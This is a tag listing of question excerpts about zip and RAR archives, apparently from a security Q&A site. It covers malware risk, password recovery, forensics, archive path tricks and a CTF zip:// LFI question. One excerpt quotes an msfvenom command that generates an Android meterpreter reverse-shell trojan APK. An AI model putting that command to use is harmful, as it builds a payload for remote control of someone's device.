Questions tagged [zip]

An archive file format that is used to bundle multiple files and folders together that may have been compressed.

93 questions
2 answers

Is it risky to download but not use a zip file?

Is there any possibility of malware infection in Windows 10 for the following three situations: When you download a zipped file, but do not use it (you do not open it)? When you only open a zipped file (with 7-zip), but do not extract/run its…
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1 answer

Lost RAR password, is there any way to access my data?

I lost my winrar password of my file. I need to access it. Is it possible? If yes, how?
1 answer

If I unzip a password-protected zip file, will the person I downloaded it from be notified in anyway?

If I access a password protected zip file, that i've downloaded through tor, and then opened the zip file, is there any way the person who posted the zip file would be able to find out that I've opened it?
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0 answers

rar and zip password encoding scheme

What encoding scheme is used in last versions of ZIP archives(6.3.2+) and RAR archives(3.90+), including RAR5? UTF-8/16, ASCII or something else?
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1 answer

Can unpacking a .zip file be harmful for Unix-like systems?

Let’s say there is a .zip file that contains either a virus, malware or something harmful for the computer. The computer is running a Unix-like OS, e.g. Ubuntu 18.04. Are there any security implications by only unpacking the contents of the .zip…
Kevin C
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0 answers

Working with Security Metadata in APK file

According to this Blog post, Google has added a Security Metadata on top of an APK to verify that it was originally distributed by Google Play. More specifically it adds APK Signing Block to the APK file. I have some questions regarding this: (1)…
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Hard coded paths in archive files

I am just testing some web application. In this web application, I can upload some file at least as zip archive. I came to an idea to test, if I could place a file at a specific location I want. My first idea is to put some sort of hard coded paths…
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1 answer

zap proxy - modify post to inject a zip file

I am doing a CTF image now, and I need to upload a .zip file to execute using the php wrapper zip:// using this PHP ZIP Wrapper LFI vulnerability The problem is that the only way to upload is with a POST form, so I would like to intercept the…
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1 answer

How to analyse a zip file forensically?

I have a zip file and want to know as much as possible about it. Some information is obvious like creation date etc. But what kind of information could be found by a forensic analysis?
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1 answer

Metasploit creating .ZIP files instead of .APK files?

I have been practicing using an old Android device and Kali Linux. I set up the trojan .apk file like normal, using the command msfvenom -p android/meterpreter/reverse_tcp LHOST=MyIP LPORT=RandomPort R> /root/Android.apk It created an .apk at…
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2 answers

Various questions about file compression and encryption regarding hacking (zip, rar, 7z)

So I'm curious about a few aspects of compressed files (Zip, rar, 7z, etc), and how they impact hack-ability. There is enough on this subject that I'm not clear about (since this isn't a career of mine, and I don't know too much about coding) that…
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1 answer

Is there a combination program that will generate a dictionary from a predefined list of words and numbers in specific order?

I'm sorry if this question has been asked, but I've already wasted 6 precious hours trying to find a program that will accomplish the task I'm requesting. (Perhaps I'm asking the wrong question?) Specifically, I want to create a dictionary of…
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3 answers

Gmail, Yahoo, Hotmail , and so on; How do they check the content of an attached password-protected archived file like Winrar?

How is it possible that mailing systems like Gmail, Yahoo, and Hotmail are able to check the content of an attached password-protected archived file like WINRAR, if the password cannot be guessed, brute-forced, and recovered? Or is it possible that…
3 answers

Password protected zip opened in notepad

I have two password protected zip(COmpression method: normal) file with the same content(aaa.txt(blank notepad)) and I opened the zips and this came up. First one's password is: abcd PK Rd¦D aaa.txtóH¼”„.‚ûÄFPK PK …
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2 answers

Restricting locations for unzipping a zip file

I hope that I have found the correct place to ask my question regarding unzipping files. I would like to see if there is a way to restrict the locations available to the user to unzip a password protected zip file in order to ensure security of the…
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